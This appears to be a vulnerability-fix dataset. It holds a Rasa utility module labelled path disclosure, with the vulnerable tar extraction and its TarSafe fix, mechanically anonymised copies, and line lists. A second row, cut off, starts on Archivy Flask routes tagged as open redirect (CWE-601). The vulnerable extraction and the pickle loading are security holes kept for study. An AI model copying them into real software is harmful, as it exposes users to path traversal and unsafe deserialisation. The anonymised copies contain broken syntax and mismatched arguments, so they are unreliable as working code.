    return jsonpickle.loads(rasa.shared.utils.io.read_file(file_name))
def json_pickle(file_name: Union[Text, Path], obj: Any) -> None:
    """Pickle an object to a file using json.

    Args:
        file_name: the file to store the object to
        obj: the object to store
    """
    import jsonpickle.ext.numpy as jsonpickle_numpy
    import jsonpickle

    # Register numpy handlers so arrays round-trip correctly.
    jsonpickle_numpy.register_handlers()

    serialized = jsonpickle.dumps(obj)
    rasa.shared.utils.io.write_text_file(serialized, file_name)
def get_emoji_regex() -> Pattern:
    """Returns regex to identify emojis."""
    emoji_character_classes = (
        "\U0001F600-\U0001F64F"  # emoticons
        "\U0001F300-\U0001F5FF"  # symbols & pictographs
        "\U0001F680-\U0001F6FF"  # transport & map symbols
        "\U0001F1E0-\U0001F1FF"  # flags (iOS)
        "\U00002702-\U000027B0"
        "\U000024C2-\U0001F251"
        "\u200d"  # zero width joiner
        "\u200c"  # zero width non-joiner
    )
    return re.compile("[" + emoji_character_classes + "]+", flags=re.UNICODE)
| import asyncio
import logging
import os
import pickle
import tarfile
from tarsafe import TarSafe
import tempfile
import warnings
import zipfile
import re
from asyncio import AbstractEventLoop
from io import BytesIO as IOReader
from pathlib import Path
from typing import Text, Any, Union, List, Type, Callable, TYPE_CHECKING, Pattern
import rasa.shared.constants
import rasa.shared.utils.io
if TYPE_CHECKING:
from prompt_toolkit.validation import Validator
def configure_colored_logging(loglevel: Text) -> None:
    """Install colored console logging at `loglevel`.

    Falls back to the level from the environment (or the project default)
    when no level is given.
    """
    import coloredlogs

    effective_level = loglevel or os.environ.get(
        rasa.shared.constants.ENV_LOG_LEVEL, rasa.shared.constants.DEFAULT_LOG_LEVEL
    )

    # Start from the library defaults, but strip the styling from
    # timestamps and debug-level messages.
    field_styles = coloredlogs.DEFAULT_FIELD_STYLES.copy()
    field_styles["asctime"] = {}
    level_styles = coloredlogs.DEFAULT_LEVEL_STYLES.copy()
    level_styles["debug"] = {}

    coloredlogs.install(
        level=effective_level,
        use_chroot=False,
        fmt="%(asctime)s %(levelname)-8s %(name)s - %(message)s",
        level_styles=level_styles,
        field_styles=field_styles,
    )
def enable_async_loop_debugging(
    event_loop: AbstractEventLoop, slow_callback_duration: float = 0.1
) -> AbstractEventLoop:
    """Enable asyncio debug diagnostics on `event_loop` and return it.

    Args:
        event_loop: the loop to instrument.
        slow_callback_duration: threshold (seconds) above which a callback
            is reported as slow.

    Returns: the same loop, for chaining.
    """
    # Log the id of the loop actually being instrumented. The previous
    # version logged `id(asyncio.get_event_loop())`, which is not
    # necessarily the loop passed in and may even create a new loop as
    # a side effect.
    logging.info(
        "Enabling coroutine debugging. Loop id {}.".format(id(event_loop))
    )

    # Enable debugging
    event_loop.set_debug(True)

    # Make the threshold for "slow" tasks very very small for
    # illustration. The default is 0.1 (= 100 milliseconds).
    event_loop.slow_callback_duration = slow_callback_duration

    # Report all mistakes managing asynchronous resources.
    warnings.simplefilter("always", ResourceWarning)
    return event_loop
def pickle_dump(filename: Union[Text, Path], obj: Any) -> None:
    """Saves object to file.

    Args:
        filename: the filename to save the object to
        obj: the object to store
    """
    with open(filename, "wb") as out_file:
        pickle.dump(obj, out_file)
def pickle_load(filename: Union[Text, Path]) -> Any:
    """Loads an object from a file.

    Args:
        filename: the filename to load the object from

    Returns: the loaded object
    """
    with open(filename, "rb") as in_file:
        return pickle.load(in_file)
def unarchive(byte_array: bytes, directory: Text) -> Text:
    """Tries to unpack a byte array interpreting it as an archive.

    Tries to use tar first to unpack, if that fails, zip will be used.

    Args:
        byte_array: raw archive content (tar or zip).
        directory: destination directory to extract into.

    Returns: the destination directory.
    """
    try:
        # TarSafe is used instead of plain `tarfile` — presumably to guard
        # against path-traversal entries (e.g. "../x") during extractall;
        # keep it that way.
        tar = TarSafe.open(fileobj=IOReader(byte_array))
        tar.extractall(directory)
        tar.close()
        return directory
    except tarfile.TarError:
        # Not a tar archive — fall back to interpreting the bytes as a zip.
        zip_ref = zipfile.ZipFile(IOReader(byte_array))
        zip_ref.extractall(directory)
        zip_ref.close()
        return directory
def create_temporary_file(data: Any, suffix: Text = "", mode: Text = "w+") -> Text:
"""Creates a tempfile.NamedTemporaryFile object for data.
mode defines NamedTemporaryFile's mode parameter in py3."""
encoding = None if "b" in mode else rasa.shared.utils.io.DEFAULT_ENCODING
f = tempfile.NamedTemporaryFile(
mode=mode, suffix=suffix, delete=False, encoding=encoding
)
f.write(data)
f.close()
return f.name
def create_temporary_directory() -> Text:
"""Creates a tempfile.TemporaryDirectory."""
f = tempfile.TemporaryDirectory()
return f.name
def create_path(file_path: Text) -> None:
"""Makes sure all directories in the 'file_path' exists."""
parent_dir = os.path.dirname(os.path.abspath(file_path))
if not os.path.exists(parent_dir):
os.makedirs(parent_dir)
def file_type_validator(
valid_file_types: List[Text], error_message: Text
) -> Type["Validator"]:
"""Creates a `Validator` class which can be used with `questionary` to validate
file paths.
"""
def is_valid(path: Text) -> bool:
return path is not None and any(
[path.endswith(file_type) for file_type in valid_file_types]
)
return create_validator(is_valid, error_message)
def not_empty_validator(error_message: Text) -> Type["Validator"]:
"""Creates a `Validator` class which can be used with `questionary` to validate
that the user entered something other than whitespace.
"""
def is_valid(input: Text) -> bool:
return input is not None and input.strip() != ""
return create_validator(is_valid, error_message)
def create_validator(
function: Callable[[Text], bool], error_message: Text
) -> Type["Validator"]:
"""Helper method to create `Validator` classes from callable functions. Should be
removed when questionary supports `Validator` objects."""
from prompt_toolkit.validation import Validator, ValidationError
from prompt_toolkit.document import Document
class FunctionValidator(Validator):
@staticmethod
def validate(document: Document) -> None:
is_valid = function(document.text)
if not is_valid:
raise ValidationError(message=error_message)
return FunctionValidator
def json_unpickle(file_name: Union[Text, Path]) -> Any:
"""Unpickle an object from file using json.
Args:
file_name: the file to load the object from
Returns: the object
"""
import jsonpickle.ext.numpy as jsonpickle_numpy
import jsonpickle
jsonpickle_numpy.register_handlers()
file_content = rasa.shared.utils.io.read_file(file_name)
return jsonpickle.loads(file_content)
def json_pickle(file_name: Union[Text, Path], obj: Any) -> None:
"""Pickle an object to a file using json.
Args:
file_name: the file to store the object to
obj: the object to store
"""
import jsonpickle.ext.numpy as jsonpickle_numpy
import jsonpickle
jsonpickle_numpy.register_handlers()
rasa.shared.utils.io.write_text_file(jsonpickle.dumps(obj), file_name)
def get_emoji_regex() -> Pattern:
"""Returns regex to identify emojis."""
return re.compile(
"["
"\U0001F600-\U0001F64F" # emoticons
"\U0001F300-\U0001F5FF" # symbols & pictographs
"\U0001F680-\U0001F6FF" # transport & map symbols
"\U0001F1E0-\U0001F1FF" # flags (iOS)
"\U00002702-\U000027B0"
"\U000024C2-\U0001F251"
"\u200d" # zero width joiner
"\u200c" # zero width non-joiner
"]+",
flags=re.UNICODE,
)
| path_disclosure | {
"code": [
" tar = tarfile.open(fileobj=IOReader(byte_array))"
],
"line_no": [
90
]
} | {
"code": [
"from tarsafe import TarSafe",
" tar = TarSafe.open(fileobj=IOReader(byte_array))"
],
"line_no": [
6,
91
]
} | import asyncio
import logging
import os
import pickle
import .tarfile
import tempfile
import warnings
import zipfile
import re
from asyncio import AbstractEventLoop
from io import BytesIO as IOReader
from pathlib import Path
from typing import Text, Any, Union, List, Type, Callable, TYPE_CHECKING, Pattern
import rasa.shared.constants
import rasa.shared.utils.io
if TYPE_CHECKING:
from prompt_toolkit.validation import Validator
def FUNC_0(VAR_0: Text) -> None:
import coloredlogs
VAR_0 = loglevel or os.environ.get(
rasa.shared.constants.ENV_LOG_LEVEL, rasa.shared.constants.DEFAULT_LOG_LEVEL
)
VAR_15 = coloredlogs.DEFAULT_FIELD_STYLES.copy()
VAR_15["asctime"] = {}
VAR_16 = coloredlogs.DEFAULT_LEVEL_STYLES.copy()
VAR_16["debug"] = {}
coloredlogs.install(
level=VAR_0,
use_chroot=False,
fmt="%(asctime)s %(levelname)-8s %(name)s - %(message)s",
VAR_16=level_styles,
VAR_15=field_styles,
)
def FUNC_1(
VAR_1: AbstractEventLoop, VAR_2: float = 0.1
) -> AbstractEventLoop:
logging.info(
"Enabling coroutine debugging. Loop id {}.".format(id(asyncio.get_event_loop()))
)
VAR_1.set_debug(True)
VAR_1.slow_callback_duration = VAR_2
warnings.simplefilter("always", ResourceWarning)
return VAR_1
def FUNC_2(VAR_3: Union[Text, Path], VAR_4: Any) -> None:
with open(VAR_3, "wb") as VAR_18:
pickle.dump(VAR_4, VAR_18)
def FUNC_3(VAR_3: Union[Text, Path]) -> Any:
with open(VAR_3, "rb") as VAR_18:
return pickle.load(VAR_18)
def FUNC_4(VAR_5: bytes, VAR_6: Text) -> Text:
try:
VAR_23 = tarfile.open(fileobj=IOReader(VAR_5))
VAR_23.extractall(VAR_6)
VAR_23.close()
return VAR_6
except tarfile.TarError:
VAR_25 = zipfile.ZipFile(IOReader(VAR_5))
VAR_25.extractall(VAR_6)
VAR_25.close()
return VAR_6
def FUNC_5(VAR_7: Any, VAR_8: Text = "", VAR_9: Text = "w+") -> Text:
VAR_17 = None if "b" in VAR_9 else rasa.shared.utils.io.DEFAULT_ENCODING
VAR_18 = tempfile.NamedTemporaryFile(
VAR_9=mode, VAR_8=suffix, delete=False, VAR_17=encoding
)
VAR_18.write(VAR_7)
VAR_18.close()
return VAR_18.name
def FUNC_6() -> Text:
VAR_18 = tempfile.TemporaryDirectory()
return VAR_18.name
def FUNC_7(VAR_10: Text) -> None:
VAR_19 = os.path.dirname(os.path.abspath(VAR_10))
if not os.path.exists(VAR_19):
os.makedirs(VAR_19)
def FUNC_8(
VAR_11: List[Text], VAR_12: Text
) -> Type["Validator"]:
def VAR_26(VAR_20: Text) -> bool:
return VAR_20 is not None and any(
[VAR_20.endswith(file_type) for file_type in VAR_11]
)
return FUNC_10(VAR_26, VAR_12)
def FUNC_9(VAR_12: Text) -> Type["Validator"]:
def VAR_26(VAR_21: Text) -> bool:
return VAR_21 is not None and VAR_21.strip() != ""
return FUNC_10(VAR_26, VAR_12)
def FUNC_10(
VAR_13: Callable[[Text], bool], VAR_12: Text
) -> Type["Validator"]:
from prompt_toolkit.validation import Validator, ValidationError
from prompt_toolkit.document import Document
class CLASS_0(Validator):
@staticmethod
def FUNC_15(VAR_24: Document) -> None:
VAR_26 = VAR_13(VAR_24.text)
if not VAR_26:
raise ValidationError(message=VAR_12)
return CLASS_0
def FUNC_11(VAR_14: Union[Text, Path]) -> Any:
import jsonpickle.ext.numpy as jsonpickle_numpy
import jsonpickle
jsonpickle_numpy.register_handlers()
VAR_22 = rasa.shared.utils.io.read_file(VAR_14)
return jsonpickle.loads(VAR_22)
def FUNC_12(VAR_14: Union[Text, Path], VAR_4: Any) -> None:
import jsonpickle.ext.numpy as jsonpickle_numpy
import jsonpickle
jsonpickle_numpy.register_handlers()
rasa.shared.utils.io.write_text_file(jsonpickle.dumps(VAR_4), VAR_14)
def FUNC_13() -> Pattern:
return re.compile(
"["
"\U0001F600-\U0001F64F" # emoticons
"\U0001F300-\U0001F5FF" # symbols & pictographs
"\U0001F680-\U0001F6FF" # transport & map symbols
"\U0001F1E0-\U0001F1FF" # flags (iOS)
"\U00002702-\U000027B0"
"\U000024C2-\U0001F251"
"\u200d" # zero width joiner
"\u200c" # zero width non-joiner
"]+",
flags=re.UNICODE,
)
| import asyncio
import logging
import os
import pickle
import .tarfile
from tarsafe import TarSafe
import tempfile
import warnings
import zipfile
import re
from asyncio import AbstractEventLoop
from io import BytesIO as IOReader
from pathlib import Path
from typing import Text, Any, Union, List, Type, Callable, TYPE_CHECKING, Pattern
import rasa.shared.constants
import rasa.shared.utils.io
if TYPE_CHECKING:
from prompt_toolkit.validation import Validator
def FUNC_0(VAR_0: Text) -> None:
import coloredlogs
VAR_0 = loglevel or os.environ.get(
rasa.shared.constants.ENV_LOG_LEVEL, rasa.shared.constants.DEFAULT_LOG_LEVEL
)
VAR_15 = coloredlogs.DEFAULT_FIELD_STYLES.copy()
VAR_15["asctime"] = {}
VAR_16 = coloredlogs.DEFAULT_LEVEL_STYLES.copy()
VAR_16["debug"] = {}
coloredlogs.install(
level=VAR_0,
use_chroot=False,
fmt="%(asctime)s %(levelname)-8s %(name)s - %(message)s",
VAR_16=level_styles,
VAR_15=field_styles,
)
def FUNC_1(
VAR_1: AbstractEventLoop, VAR_2: float = 0.1
) -> AbstractEventLoop:
logging.info(
"Enabling coroutine debugging. Loop id {}.".format(id(asyncio.get_event_loop()))
)
VAR_1.set_debug(True)
VAR_1.slow_callback_duration = VAR_2
warnings.simplefilter("always", ResourceWarning)
return VAR_1
def FUNC_2(VAR_3: Union[Text, Path], VAR_4: Any) -> None:
with open(VAR_3, "wb") as VAR_18:
pickle.dump(VAR_4, VAR_18)
def FUNC_3(VAR_3: Union[Text, Path]) -> Any:
with open(VAR_3, "rb") as VAR_18:
return pickle.load(VAR_18)
def FUNC_4(VAR_5: bytes, VAR_6: Text) -> Text:
try:
VAR_23 = TarSafe.open(fileobj=IOReader(VAR_5))
VAR_23.extractall(VAR_6)
VAR_23.close()
return VAR_6
except tarfile.TarError:
VAR_25 = zipfile.ZipFile(IOReader(VAR_5))
VAR_25.extractall(VAR_6)
VAR_25.close()
return VAR_6
def FUNC_5(VAR_7: Any, VAR_8: Text = "", VAR_9: Text = "w+") -> Text:
VAR_17 = None if "b" in VAR_9 else rasa.shared.utils.io.DEFAULT_ENCODING
VAR_18 = tempfile.NamedTemporaryFile(
VAR_9=mode, VAR_8=suffix, delete=False, VAR_17=encoding
)
VAR_18.write(VAR_7)
VAR_18.close()
return VAR_18.name
def FUNC_6() -> Text:
VAR_18 = tempfile.TemporaryDirectory()
return VAR_18.name
def FUNC_7(VAR_10: Text) -> None:
VAR_19 = os.path.dirname(os.path.abspath(VAR_10))
if not os.path.exists(VAR_19):
os.makedirs(VAR_19)
def FUNC_8(
VAR_11: List[Text], VAR_12: Text
) -> Type["Validator"]:
def VAR_26(VAR_20: Text) -> bool:
return VAR_20 is not None and any(
[VAR_20.endswith(file_type) for file_type in VAR_11]
)
return FUNC_10(VAR_26, VAR_12)
def FUNC_9(VAR_12: Text) -> Type["Validator"]:
def VAR_26(VAR_21: Text) -> bool:
return VAR_21 is not None and VAR_21.strip() != ""
return FUNC_10(VAR_26, VAR_12)
def FUNC_10(
VAR_13: Callable[[Text], bool], VAR_12: Text
) -> Type["Validator"]:
from prompt_toolkit.validation import Validator, ValidationError
from prompt_toolkit.document import Document
class CLASS_0(Validator):
@staticmethod
def FUNC_15(VAR_24: Document) -> None:
VAR_26 = VAR_13(VAR_24.text)
if not VAR_26:
raise ValidationError(message=VAR_12)
return CLASS_0
def FUNC_11(VAR_14: Union[Text, Path]) -> Any:
import jsonpickle.ext.numpy as jsonpickle_numpy
import jsonpickle
jsonpickle_numpy.register_handlers()
VAR_22 = rasa.shared.utils.io.read_file(VAR_14)
return jsonpickle.loads(VAR_22)
def FUNC_12(VAR_14: Union[Text, Path], VAR_4: Any) -> None:
import jsonpickle.ext.numpy as jsonpickle_numpy
import jsonpickle
jsonpickle_numpy.register_handlers()
rasa.shared.utils.io.write_text_file(jsonpickle.dumps(VAR_4), VAR_14)
def FUNC_13() -> Pattern:
return re.compile(
"["
"\U0001F600-\U0001F64F" # emoticons
"\U0001F300-\U0001F5FF" # symbols & pictographs
"\U0001F680-\U0001F6FF" # transport & map symbols
"\U0001F1E0-\U0001F1FF" # flags (iOS)
"\U00002702-\U000027B0"
"\U000024C2-\U0001F251"
"\u200d" # zero width joiner
"\u200c" # zero width non-joiner
"]+",
flags=re.UNICODE,
)
| [
14,
17,
20,
21,
24,
28,
40,
41,
48,
49,
51,
52,
53,
55,
56,
59,
60,
63,
70,
71,
74,
77,
82,
83,
86,
88,
99,
100,
103,
105,
111,
114,
115,
120,
121,
124,
128,
129,
136,
141,
143,
144,
149,
152,
154,
155,
161,
164,
171,
173,
174,
177,
180,
185,
187,
190,
191,
194,
201,
203,
205,
206,
222,
62,
63,
64,
65,
66,
67,
73,
74,
75,
76,
77,
78,
79,
85,
86,
87,
102,
103,
104,
117,
123,
133,
134,
135,
146,
147,
148,
159,
160,
176,
177,
178,
179,
180,
181,
182,
193,
194,
195,
196,
197,
198,
208
] | [
15,
18,
21,
22,
25,
29,
41,
42,
49,
50,
52,
53,
54,
56,
57,
60,
61,
64,
71,
72,
75,
78,
83,
84,
87,
89,
100,
101,
104,
106,
112,
115,
116,
121,
122,
125,
129,
130,
137,
142,
144,
145,
150,
153,
155,
156,
162,
165,
172,
174,
175,
178,
181,
186,
188,
191,
192,
195,
202,
204,
206,
207,
223,
63,
64,
65,
66,
67,
68,
74,
75,
76,
77,
78,
79,
80,
86,
87,
88,
103,
104,
105,
118,
124,
134,
135,
136,
147,
148,
149,
160,
161,
177,
178,
179,
180,
181,
182,
183,
194,
195,
196,
197,
198,
199,
209
] |
4CWE-601
| from pathlib import Path
from os.path import sep
from pkg_resources import require
from shutil import which
import frontmatter
from flask import (
render_template,
flash,
redirect,
request,
url_for,
send_file,
send_from_directory,
)
from flask_login import login_user, current_user, logout_user
from tinydb import Query
from werkzeug.security import check_password_hash, generate_password_hash
from archivy.models import DataObj, User
from archivy import data, app, forms, csrf
from archivy.helpers import get_db, write_config
from archivy.tags import get_all_tags
from archivy.search import search, search_frontmatter_tags
from archivy.config import Config
import re
@app.context_processor
def pass_defaults():
    """Inject the item tree, path separator and version into all templates."""
    items = data.get_items(load_content=False)
    installed_version = require("archivy")[0].version

    # check windows parsing for js (https://github.com/Uzay-G/archivy/issues/115)
    separator = "\\\\" if sep == "\\" else sep

    return dict(dataobjs=items, SEP=separator, version=installed_version)
@app.before_request
def check_perms():
    """Redirect unauthenticated users to the login page.

    The login page, static assets and the API login endpoint remain
    reachable without a session.
    """
    public_prefixes = ("/login", "/static", "/api/login")
    if current_user.is_authenticated or request.path.startswith(public_prefixes):
        return
    return redirect(url_for("login", next=request.path))
@app.route("/")
@app.route("/index")
def index():
    """Render the homepage listing for the directory given by `?path=`."""
    path = request.args.get("path", "").lstrip("/")
    try:
        files = data.get_items(path=path)
    except FileNotFoundError:
        flash("Directory does not exist.", "error")
        return redirect("/")
    return render_template(
        "home.html",
        title=path or "root",
        search_enabled=app.config["SEARCH_CONF"]["enabled"],
        dir=files,
        current_path=path,
        new_folder_form=forms.NewFolderForm(),
        delete_form=forms.DeleteFolderForm(),
        rename_form=forms.RenameDirectoryForm(),
        view_only=0,
        search_engine=app.config["SEARCH_CONF"]["engine"],
    )
# TODO: refactor two following methods
@app.route("/bookmarks/new", methods=["GET", "POST"])
def new_bookmark():
    """Show and process the form for saving a new bookmark.

    GET pre-fills the form from the `url`/`path` query args (used by the
    bookmarklet); POST creates the bookmark and redirects to it.
    """
    default_dir = app.config.get("DEFAULT_BOOKMARKS_DIR", "root directory")
    form = forms.NewBookmarkForm(path=default_dir)
    form.path.choices = [("", "root directory")] + [
        (pathname, pathname) for pathname in data.get_dirs()
    ]
    if form.validate_on_submit():
        path = form.path.data
        # Comma-separated tag string -> list of stripped tag names.
        tags = form.tags.data.split(",") if form.tags.data != "" else []
        tags = [tag.strip() for tag in tags]
        bookmark = DataObj(url=form.url.data, tags=tags, path=path, type="bookmark")
        bookmark.process_bookmark_url()
        bookmark_id = bookmark.insert()
        if bookmark_id:
            flash("Bookmark Saved!", "success")
            return redirect(f"/dataobj/{bookmark_id}")
        else:
            flash(bookmark.error, "error")
            return redirect("/bookmarks/new")
    # for bookmarklet
    form.url.data = request.args.get("url", "")
    path = request.args.get("path", default_dir).strip("/")
    # handle empty argument
    form.path.data = path
    return render_template("dataobjs/new.html", title="New Bookmark", form=form)
@app.route("/notes/new", methods=["GET", "POST"])
def new_note():
    """Show and process the form for creating a new note."""
    form = forms.NewNoteForm()
    default_dir = "root directory"
    form.path.choices = [("", default_dir)] + [
        (pathname, pathname) for pathname in data.get_dirs()
    ]
    if form.validate_on_submit():
        path = form.path.data
        # Comma-separated tag string -> list of stripped tag names.
        tags = form.tags.data.split(",") if form.tags.data != "" else []
        tags = [tag.strip() for tag in tags]
        note = DataObj(title=form.title.data, path=path, tags=tags, type="note")
        note_id = note.insert()
        if note_id:
            flash("Note Saved!", "success")
            return redirect(f"/dataobj/{note_id}")
    path = request.args.get("path", default_dir).strip("/")
    # handle empty argument
    form.path.data = path
    return render_template("/dataobjs/new.html", title="New Note", form=form)
@app.route("/tags")
def show_all_tags():
    """List every tag found across the knowledge base."""
    uses_ripgrep_engine = app.config["SEARCH_CONF"]["engine"] == "ripgrep"
    if not uses_ripgrep_engine and not which("rg"):
        flash("Ripgrep must be installed to view pages about embedded tags.", "error")
        return redirect("/")

    all_tags = sorted(get_all_tags(force=True))
    return render_template("tags/all.html", title="All Tags", tags=all_tags)
@app.route("/tags/<tag_name>")
def show_tag(tag_name):
    """List all items carrying `tag_name`, from both embedded tags and frontmatter."""
    if not app.config["SEARCH_CONF"]["enabled"] and not which("rg"):
        flash(
            "Search (for example ripgrep) must be installed to view pages about embedded tags.",
            "error",
        )
        return redirect("/")
    # Embedded tags appear in item bodies as `#tag#`.
    results = search(f"#{tag_name}#", strict=True)
    res_ids = set(
        [item["id"] for item in results]
    )  # avoid duplication of results between context-aware embedded tags and metadata ones
    for res in search_frontmatter_tags(tag_name):
        if res["id"] not in res_ids:
            results.append(res)
    return render_template(
        "tags/show.html",
        title=f"Tags - {tag_name}",
        tag_name=tag_name,
        search_result=results,
    )
@app.route("/dataobj/<int:dataobj_id>")
def show_dataobj(dataobj_id):
    """Render a single item with its backlinks, tags and edit forms."""
    dataobj = data.get_item(dataobj_id)
    get_title_id_pairs = lambda x: (x["title"], x["id"])
    titles = list(
        map(get_title_id_pairs, data.get_items(structured=False, load_content=False))
    )
    if not dataobj:
        flash("Data could not be found!", "error")
        return redirect("/")
    # `?raw=1` returns the item as plain frontmatter text instead of HTML.
    if request.args.get("raw") == "1":
        return frontmatter.dumps(dataobj)
    backlinks = []
    if app.config["SEARCH_CONF"]["enabled"]:
        # The wiki-link suffix `|<id>]]` needs different escaping per engine.
        if app.config["SEARCH_CONF"]["engine"] == "ripgrep":
            query = f"\|{dataobj_id}]]"
        else:
            query = f"|{dataobj_id})]]"
        backlinks = search(query, strict=True)
    # Form for moving data into another folder
    move_form = forms.MoveItemForm()
    move_form.path.choices = [("", "root directory")] + [
        (pathname, pathname) for pathname in data.get_dirs()
    ]
    post_title_form = forms.TitleForm()
    post_title_form.title.data = dataobj["title"]
    # Get all tags
    tag_list = get_all_tags()
    # and the ones present in this dataobj
    embedded_tags = set()
    # Embedded tags look like `#tag#` at the start of a line or after a space.
    PATTERN = r"(?:^|\n| )#(?:[-_a-zA-ZÀ-ÖØ-öø-ÿ0-9]+)#"
    for match in re.finditer(PATTERN, dataobj.content):
        embedded_tags.add(match.group(0).replace("#", "").lstrip())
    return render_template(
        "dataobjs/show.html",
        title=dataobj["title"],
        dataobj=dataobj,
        backlinks=backlinks,
        current_path=dataobj["dir"],
        form=forms.DeleteDataForm(),
        view_only=0,
        search_enabled=app.config["SEARCH_CONF"]["enabled"],
        post_title_form=post_title_form,
        move_form=move_form,
        tag_list=tag_list,
        embedded_tags=embedded_tags,
        titles=titles,
    )
@app.route("/dataobj/move/<int:dataobj_id>", methods=["POST"])
def move_item(dataobj_id):
    """Move dataobj `dataobj_id` into the directory posted in the form."""
    form = forms.MoveItemForm()
    out_dir = form.path.data if form.path.data != "" else "root directory"
    # `is None` instead of `== None`: identity is the correct idiom for
    # None checks and is not affected by custom __eq__ implementations.
    if form.path.data is None:
        flash("No path specified.")
        return redirect(f"/dataobj/{dataobj_id}")
    try:
        if data.move_item(dataobj_id, form.path.data):
            flash(f"Data successfully moved to {out_dir}.", "success")
            return redirect(f"/dataobj/{dataobj_id}")
        else:
            flash(f"Data could not be moved to {out_dir}.", "error")
            return redirect(f"/dataobj/{dataobj_id}")
    except FileNotFoundError:
        flash("Data not found.", "error")
        return redirect("/")
    except FileExistsError:
        flash("Data already in target directory.", "error")
        return redirect(f"/dataobj/{dataobj_id}")
@app.route("/dataobj/delete/<int:dataobj_id>", methods=["POST"])
def delete_data(dataobj_id):
    """Delete dataobj `dataobj_id` and return to the homepage."""
    try:
        data.delete_item(dataobj_id)
    except Exception:
        # Catch `Exception`, not `BaseException`: the previous broad catch
        # would also swallow KeyboardInterrupt and SystemExit.
        flash("Data could not be found!", "error")
        return redirect("/")
    flash("Data deleted!", "success")
    return redirect("/")
@app.route("/login", methods=["GET", "POST"])
def login():
    """Authenticate a user and redirect to the originally requested page.

    The `next` query parameter is only honoured when it is a same-site
    relative path: redirecting to an attacker-controlled absolute URL
    would be an open redirect (CWE-601).
    """
    form = forms.UserForm()
    if form.validate_on_submit():
        db = get_db()
        user = db.search(
            (Query().username == form.username.data) & (Query().type == "user")
        )
        if user and check_password_hash(user[0]["hashed_password"], form.password.data):
            user = User.from_db(user[0])
            login_user(user, remember=True)
            flash("Login successful!", "success")
            next_url = request.args.get("next")
            # Accept only paths starting with a single "/": "//host" and
            # "/\host" are scheme-relative URLs browsers would follow
            # off-site, and absolute URLs are rejected outright.
            if (
                not next_url
                or not next_url.startswith("/")
                or next_url.startswith("//")
                or next_url.startswith("/\\")
            ):
                next_url = "/"
            return redirect(next_url)
        flash("Invalid credentials", "error")
        return redirect("/login")
    return render_template("users/login.html", form=form, title="Login")
@app.route("/logout", methods=["DELETE", "GET"])
def logout():
    """End the current user session and return to the homepage."""
    logout_user()
    flash("Logged out successfully", "success")
    return redirect("/")
@app.route("/user/edit", methods=["GET", "POST"])
def edit_user():
    """Let the logged-in user change their username and password."""
    form = forms.UserForm()
    if form.validate_on_submit():
        db = get_db()
        # Only the hash of the new password is persisted.
        db.update(
            {
                "username": form.username.data,
                "hashed_password": generate_password_hash(form.password.data),
            },
            doc_ids=[current_user.id],
        )
        flash("Information saved!", "success")
        return redirect("/")
    form.username.data = current_user.username
    return render_template("users/edit.html", form=form, title="Edit Profile")
@app.route("/folders/create", methods=["POST"])
def create_folder():
    """Create a new subdirectory under the submitted parent directory."""
    form = forms.NewFolderForm()
    if form.validate_on_submit():
        path = Path(form.parent_dir.data.strip("/")) / form.new_dir.data
        new_path = data.create_dir(str(path))
        flash("Folder successfully created.", "success")
        return redirect(f"/?path={new_path}")
    flash("Could not create folder.", "error")
    return redirect(request.referrer or "/")
@app.route("/folders/delete", methods=["POST"])
def delete_folder():
    """Delete the submitted directory, redirecting back on failure."""
    form = forms.DeleteFolderForm()
    if form.validate_on_submit():
        if data.delete_dir(form.dir_name.data):
            flash("Folder successfully deleted.", "success")
            return redirect("/")
        else:
            flash("Folder not found.", "error")
            return redirect(request.referrer or "/", 404)
    flash("Could not delete folder.", "error")
    return redirect(request.referrer or "/")
@app.route("/folders/rename", methods=["POST"])
def rename_folder():
    """Rename a directory, flashing a message for each failure mode."""
    form = forms.RenameDirectoryForm()
    if form.validate_on_submit():
        try:
            new_path = data.rename_folder(form.current_path.data, form.new_name.data)
            # A falsy result signals the helper rejected the input.
            if not new_path:
                flash("Invalid input.", "error")
            else:
                flash("Renamed successfully.", "success")
                return redirect(f"/?path={new_path}")
        except FileNotFoundError:
            flash("Directory not found.", "error")
        except FileExistsError:
            flash("Target directory exists.", "error")
    return redirect("/")
@app.route("/bookmarklet")
def bookmarklet():
    """Render the bookmarklet page."""
    return render_template("bookmarklet.html", title="Bookmarklet")
@app.route("/images/<filename>")
def serve_image(filename):
    """Serve a stored image after validating the requested filename."""
    # Validate the filename first so arbitrary file paths cannot be requested.
    if filename and data.valid_image_filename(filename):
        image_path = data.image_exists(filename)
        if image_path:
            return send_file(image_path)
        else:
            return "Image not found", 404
    else:
        return "Invalid file request", 413
@app.route("/static/custom.css")
def custom_css():
    """Serve the user's custom stylesheet, or an empty body when disabled."""
    if not app.config["THEME_CONF"].get("use_custom_css", False):
        return ""
    return send_from_directory(
        Path(app.config["USER_DIR"]) / "css",
        app.config["THEME_CONF"]["custom_css_file"],
    )
@app.route("/config", methods=["GET", "POST"])
def config():
    """
    Web View to edit and update configuration.
    """
    # Recursively copy submitted values into the target dictionary,
    # never overwriting SECRET_KEY.
    def update_config_value(key, val, dictionary):
        if key != "SECRET_KEY":
            if type(val) is dict:
                for k, v in val.items():
                    update_config_value(k, v, dictionary[key])
            else:
                dictionary[key] = val
    form = forms.config_form(app.config)
    default = vars(Config())
    if form.validate_on_submit():
        changed_config = Config()
        changed_config.override(form.data)
        for k, v in vars(changed_config).items():
            # propagate changes to configuration
            update_config_value(k, v, app.config)
        write_config(vars(changed_config))  # save to filesystem config
        flash("Config successfully updated.", "success")
    elif request.method == "POST":
        flash("Could not update config.", "error")
    return render_template(
        "config.html", conf=form, default=default, title="Edit Config"
    )
@csrf.exempt  # exempt from CSRF to be able to submit info directly from bookmarklet
@app.route("/save_from_bookmarklet", methods=["POST"])
def save_raw_url():
    """
    Used in the bookmarklet - Saves a URL by taking its raw HTML.

    POST parameters:
        - html
        - url
    """
    html = request.form.get("html")
    if not html:
        return "No HTML provided", 400
    bookmark = DataObj(url=request.form.get("url"), type="bookmark")
    # Parse the browser-supplied HTML directly instead of re-fetching the URL.
    bookmark.process_bookmark_url(html)
    if bookmark.insert():
        return redirect(f"/dataobj/{bookmark.id}")
    else:
        return "Could not save bookmark", 500
| from pathlib import Path
from os.path import sep
from pkg_resources import require
from shutil import which
import frontmatter
from flask import (
render_template,
flash,
redirect,
request,
url_for,
send_file,
send_from_directory,
)
from flask_login import login_user, current_user, logout_user
from tinydb import Query
from werkzeug.security import check_password_hash, generate_password_hash
from archivy.models import DataObj, User
from archivy import data, app, forms, csrf
from archivy.helpers import get_db, write_config, is_safe_redirect_url
from archivy.tags import get_all_tags
from archivy.search import search, search_frontmatter_tags
from archivy.config import Config
import re
@app.context_processor
def pass_defaults():
